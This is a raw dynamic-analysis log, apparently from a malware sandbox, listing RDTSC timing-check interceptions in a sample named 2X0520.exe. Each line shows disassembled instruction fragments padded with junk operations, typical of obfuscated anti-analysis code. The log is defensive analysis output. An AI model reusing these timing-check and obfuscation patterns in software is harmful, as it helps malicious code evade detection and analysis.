Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	RDTSC instruction interceptor: First address: A0BBD7 second address: A0BBE6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3838D0CF4Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	RDTSC instruction interceptor: First address: A0DBF5 second address: A0DBFA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	RDTSC instruction interceptor: First address: A0DBFA second address: A0DC26 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jmp 00007F3838D0CF51h 0x00000008 pop edi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov eax, dword ptr [eax] 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F3838D0CF51h 0x00000014 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	RDTSC instruction interceptor: First address: A0DC26 second address: A0DC2C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	RDTSC instruction interceptor: First address: A0DDD2 second address: A0DE3B instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pushad 0x00000004 popad 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 pushad 0x0000000a or esi, 1FA40F7Bh 0x00000010 cld 0x00000011 popad 0x00000012 push 00000000h 0x00000014 clc 0x00000015 push 64C288FAh 0x0000001a jmp 00007F3838D0CF4Dh 0x0000001f xor dword ptr [esp], 64C2887Ah 0x00000026 mov ecx, ebx 0x00000028 push 00000003h 0x0000002a mov dl, B2h 0x0000002c push 00000000h 0x0000002e push 00000000h 0x00000030 push esi 0x00000031 call 00007F3838D0CF48h 0x00000036 pop esi 0x00000037 mov dword ptr [esp+04h], esi 0x0000003b add dword ptr [esp+04h], 00000019h 0x00000043 inc esi 0x00000044 push esi 0x00000045 ret 0x00000046 pop esi 0x00000047 ret 0x00000048 push 00000003h 0x0000004a mov ecx, edi 0x0000004c push E7489CE9h 0x00000051 pushad 0x00000052 push eax 0x00000053 push edx 0x00000054 jns 00007F3838D0CF46h 0x0000005a rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	RDTSC instruction interceptor: First address: A0DE3B second address: A0DE76 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3838E06D1Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a pushad 0x0000000b popad 0x0000000c jns 00007F3838E06D16h 0x00000012 popad 0x00000013 popad 0x00000014 xor dword ptr [esp], 27489CE9h 0x0000001b adc esi, 093F5D0Ah 0x00000021 lea ebx, dword ptr [ebp+1245AB3Ah] 0x00000027 mov ch, 46h 0x00000029 mov esi, dword ptr [ebp+122D2D34h] 0x0000002f xchg eax, ebx 0x00000030 pushad 0x00000031 push eax 0x00000032 push edx 0x00000033 pushad 0x00000034 popad 0x00000035 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	RDTSC instruction interceptor: First address: A0DE76 second address: A0DE7A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	RDTSC instruction interceptor: First address: A0DEF9 second address: A0DF3F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 xor dword ptr [esp], 4E2290FFh 0x0000000e mov edx, dword ptr [ebp+122D2B38h] 0x00000014 mov cx, 3484h 0x00000018 push 00000003h 0x0000001a or si, 265Dh 0x0000001f push 00000000h 0x00000021 mov esi, 369B9500h 0x00000026 push 00000003h 0x00000028 xor dword ptr [ebp+122D1EB5h], edx 0x0000002e call 00007F3838E06D19h 0x00000033 push eax 0x00000034 push edx 0x00000035 push eax 0x00000036 push edx 0x00000037 jmp 00007F3838E06D1Bh 0x0000003c rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	RDTSC instruction interceptor: First address: A0DF3F second address: A0DF43 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	RDTSC instruction interceptor: First address: A0DF43 second address: A0DF49 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	RDTSC instruction interceptor: First address: A0DF49 second address: A0DF62 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3838D0CF50h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	RDTSC instruction interceptor: First address: A0DF62 second address: A0DF6C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	RDTSC instruction interceptor: First address: A0DF6C second address: A0DF84 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 mov eax, dword ptr [esp+04h] 0x0000000a je 00007F3838D0CF58h 0x00000010 push eax 0x00000011 push edx 0x00000012 js 00007F3838D0CF46h 0x00000018 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	RDTSC instruction interceptor: First address: A0DF84 second address: A0DFA3 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F3838E06D16h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov eax, dword ptr [eax] 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F3838E06D21h 0x00000013 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	RDTSC instruction interceptor: First address: A0DFA3 second address: A0DFE2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3838D0CF52h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp+04h], eax 0x0000000d ja 00007F3838D0CF4Eh 0x00000013 pop eax 0x00000014 lea ebx, dword ptr [ebp+1245AB45h] 0x0000001a stc 0x0000001b xchg eax, ebx 0x0000001c push eax 0x0000001d push edx 0x0000001e jne 00007F3838D0CF4Ch 0x00000024 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	RDTSC instruction interceptor: First address: A0DFE2 second address: A0DFE8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	RDTSC instruction interceptor: First address: A0DFE8 second address: A0DFEC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	RDTSC instruction interceptor: First address: A2C832 second address: A2C836 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	RDTSC instruction interceptor: First address: A2C836 second address: A2C83C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	RDTSC instruction interceptor: First address: A2C83C second address: A2C84B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jg 00007F3838E06D16h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	RDTSC instruction interceptor: First address: A2C9FD second address: A2CA18 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F3838D0CF57h 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	RDTSC instruction interceptor: First address: A2CB9E second address: A2CBA6 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	RDTSC instruction interceptor: First address: A2CBA6 second address: A2CBB0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jbe 00007F3838D0CF46h 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	RDTSC instruction interceptor: First address: A2CD42 second address: A2CD66 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 js 00007F3838E06D18h 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e push eax 0x0000000f push edx 0x00000010 jns 00007F3838E06D24h 0x00000016 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	RDTSC instruction interceptor: First address: A2D471 second address: A2D4B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F3838D0CF52h 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c jmp 00007F3838D0CF57h 0x00000011 pushad 0x00000012 jmp 00007F3838D0CF4Bh 0x00000017 push esi 0x00000018 pop esi 0x00000019 push ebx 0x0000001a pop ebx 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	RDTSC instruction interceptor: First address: A2D8D6 second address: A2D8EE instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jmp 00007F3838E06D23h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	RDTSC instruction interceptor: First address: 9EF51C second address: 9EF522 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	RDTSC instruction interceptor: First address: 9EF522 second address: 9EF526 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	RDTSC instruction interceptor: First address: A2DFA6 second address: A2DFAA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	RDTSC instruction interceptor: First address: A2E290 second address: A2E29A instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 pushad 0x00000008 popad 0x00000009 pop ebx 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	RDTSC instruction interceptor: First address: A301AC second address: A301B2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	RDTSC instruction interceptor: First address: A309A5 second address: A309A9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	RDTSC instruction interceptor: First address: A309A9 second address: A309BA instructions: 0x00000000 rdtsc 0x00000002 jng 00007F3838D0CF46h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	RDTSC instruction interceptor: First address: A309BA second address: A309BE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	RDTSC instruction interceptor: First address: A32E94 second address: A32EB0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jne 00007F3838D0CF46h 0x00000009 jmp 00007F3838D0CF51h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	RDTSC instruction interceptor: First address: A32EB0 second address: A32EBC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push ebx 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	RDTSC instruction interceptor: First address: A32EBC second address: A32EEB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3838D0CF4Ch 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F3838D0CF55h 0x00000012 jbe 00007F3838D0CF46h 0x00000018 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	RDTSC instruction interceptor: First address: 9F46D0 second address: 9F46DC instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push esi 0x00000009 pop esi 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	RDTSC instruction interceptor: First address: 9F46DC second address: 9F46F5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3838D0CF50h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	RDTSC instruction interceptor: First address: 9F9658 second address: 9F9662 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push edi 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	RDTSC instruction interceptor: First address: 9F9662 second address: 9F9669 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edi 0x00000007 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	RDTSC instruction interceptor: First address: 9F9669 second address: 9F966E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	RDTSC instruction interceptor: First address: 9F966E second address: 9F9689 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F3838D0CF55h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	RDTSC instruction interceptor: First address: 9F9689 second address: 9F9698 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 jnp 00007F3838E06D16h 0x0000000f rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	RDTSC instruction interceptor: First address: 9F9698 second address: 9F969E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	RDTSC instruction interceptor: First address: A3956D second address: A39573 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	RDTSC instruction interceptor: First address: A3CF34 second address: A3CF60 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3838D0CF4Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a jo 00007F3838D0CF46h 0x00000010 jns 00007F3838D0CF46h 0x00000016 popad 0x00000017 popad 0x00000018 push eax 0x00000019 push eax 0x0000001a push edx 0x0000001b push eax 0x0000001c push edx 0x0000001d jns 00007F3838D0CF46h 0x00000023 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	RDTSC instruction interceptor: First address: A3CF60 second address: A3CF77 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3838E06D23h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	RDTSC instruction interceptor: First address: A3D153 second address: A3D166 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop esi 0x00000005 ja 00007F3838D0CF46h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f pushad 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	RDTSC instruction interceptor: First address: A3D883 second address: A3D887 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	RDTSC instruction interceptor: First address: A3D887 second address: A3D8A0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F3838D0CF51h 0x0000000d rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	RDTSC instruction interceptor: First address: A3D92D second address: A3D947 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3838E06D26h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	RDTSC instruction interceptor: First address: A3DD02 second address: A3DD06 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	RDTSC instruction interceptor: First address: A3DD06 second address: A3DD10 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F3838E06D16h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	RDTSC instruction interceptor: First address: A3DD10 second address: A3DD21 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F3838D0CF4Dh 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	RDTSC instruction interceptor: First address: A3DDA4 second address: A3DDDA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3838E06D27h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F3838E06D28h 0x00000011 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	RDTSC instruction interceptor: First address: A3DE3D second address: A3DE41 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	RDTSC instruction interceptor: First address: A3DE41 second address: A3DE62 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F3838E06D29h 0x0000000d rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	RDTSC instruction interceptor: First address: A3DE62 second address: A3DEC3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 pushad 0x00000009 push ebx 0x0000000a push ebx 0x0000000b pop ebx 0x0000000c pop ebx 0x0000000d jmp 00007F3838D0CF57h 0x00000012 popad 0x00000013 nop 0x00000014 push 00000000h 0x00000016 push edx 0x00000017 call 00007F3838D0CF48h 0x0000001c pop edx 0x0000001d mov dword ptr [esp+04h], edx 0x00000021 add dword ptr [esp+04h], 00000017h 0x00000029 inc edx 0x0000002a push edx 0x0000002b ret 0x0000002c pop edx 0x0000002d ret 0x0000002e xchg eax, ebx 0x0000002f push eax 0x00000030 push edx 0x00000031 jmp 00007F3838D0CF59h 0x00000036 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	RDTSC instruction interceptor: First address: A3DEC3 second address: A3DEC8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	RDTSC instruction interceptor: First address: A3DEC8 second address: A3DEE4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F3838D0CF4Fh 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 pop eax 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	RDTSC instruction interceptor: First address: A3DEE4 second address: A3DEF8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F3838E06D1Ch 0x0000000d rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	RDTSC instruction interceptor: First address: A3EC92 second address: A3ECA7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pop edi 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F3838D0CF4Ch 0x0000000e rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	RDTSC instruction interceptor: First address: A3ECA7 second address: A3ECB8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F3838E06D1Dh 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	RDTSC instruction interceptor: First address: A3ECB8 second address: A3ED06 instructions: 0x00000000 rdtsc 0x00000002 je 00007F3838D0CF46h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c nop 0x0000000d adc si, B114h 0x00000012 push 00000000h 0x00000014 push 00000000h 0x00000016 push ebp 0x00000017 call 00007F3838D0CF48h 0x0000001c pop ebp 0x0000001d mov dword ptr [esp+04h], ebp 0x00000021 add dword ptr [esp+04h], 0000001Ch 0x00000029 inc ebp 0x0000002a push ebp 0x0000002b ret 0x0000002c pop ebp 0x0000002d ret 0x0000002e push 00000000h 0x00000030 and si, 50CAh 0x00000035 pushad 0x00000036 and ecx, dword ptr [ebp+124574C2h] 0x0000003c popad 0x0000003d xchg eax, ebx 0x0000003e push eax 0x0000003f push edx 0x00000040 push eax 0x00000041 push edx 0x00000042 push eax 0x00000043 push edx 0x00000044 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	RDTSC instruction interceptor: First address: A3ED06 second address: A3ED0A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	RDTSC instruction interceptor: First address: A3ED0A second address: A3ED14 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F3838D0CF46h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	RDTSC instruction interceptor: First address: A3FC8E second address: A3FC9C instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 ja 00007F3838E06D16h 0x0000000e rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	RDTSC instruction interceptor: First address: A40819 second address: A40824 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 je 00007F3838D0CF46h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	RDTSC instruction interceptor: First address: A41C73 second address: A41CC8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jns 00007F3838E06D16h 0x00000009 jmp 00007F3838E06D29h 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 mov dword ptr [esp], eax 0x00000014 mov edi, 28F8D20Ch 0x00000019 push 00000000h 0x0000001b jns 00007F3838E06D16h 0x00000021 push 00000000h 0x00000023 and esi, 05E4782Bh 0x00000029 push eax 0x0000002a push eax 0x0000002b push edx 0x0000002c pushad 0x0000002d pushad 0x0000002e popad 0x0000002f jmp 00007F3838E06D21h 0x00000034 popad 0x00000035 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	RDTSC instruction interceptor: First address: A419D1 second address: A419E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pop esi 0x00000006 push eax 0x00000007 push ecx 0x00000008 je 00007F3838D0CF4Ch 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	RDTSC instruction interceptor: First address: A427AC second address: A427B2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	RDTSC instruction interceptor: First address: A427B2 second address: A427B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	RDTSC instruction interceptor: First address: A432A6 second address: A432CF instructions: 0x00000000 rdtsc 0x00000002 jno 00007F3838E06D16h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jnc 00007F3838E06D2Bh 0x00000014 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	RDTSC instruction interceptor: First address: A459FB second address: A45A00 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	RDTSC instruction interceptor: First address: A45FDE second address: A45FEB instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F3838E06D16h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	RDTSC instruction interceptor: First address: A46FEC second address: A46FF2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	RDTSC instruction interceptor: First address: A49DFA second address: A49E04 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F3838E06D16h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	RDTSC instruction interceptor: First address: A49E04 second address: A49E29 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push edx 0x00000004 pop edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a push eax 0x0000000b jmp 00007F3838D0CF50h 0x00000010 pop eax 0x00000011 pushad 0x00000012 jo 00007F3838D0CF46h 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
